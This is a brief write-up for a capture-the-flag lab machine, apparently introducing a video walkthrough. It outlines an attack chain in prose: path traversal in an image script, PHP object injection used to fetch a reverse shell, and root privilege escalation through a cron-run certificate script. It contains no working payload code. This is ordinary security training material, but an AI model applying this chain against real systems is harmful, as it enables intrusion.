The video consist of my process of enumeration and overall hacking the machine, please use this as a walkthrough.
This box consist of several vulnerabilities:
- Local File Inclusion/Path traversal - The query string
img.phpfile is vulnerable to that, with that we can download the site map that I’ve discovered using Burp
- Deserialization / PHP Object Injection - I saw that in the
utils.phpfile, and I’ve prepared a payload for the
AvatarInterfacesince this is the class that is using magic methods, and it has the
file_get_contentsfunction that we are going to use to pull the PHP reverse shell.
- Linux Privilege Escalation - By pure luck, I noticed the
/opt/folder, and I immediately noted that this must be the vector that needs to be leveraged to gain privilege escalation. A much better way to figure out this can be the pspy tool, which could have shown me this command that is being run as root:
timeout 10 /bin/bash -c /opt/renew_cert.sh /home/bill/Certs/broscience.crtand I did look up for some hints, thanks to gatogamer1155and his writeup for this machine.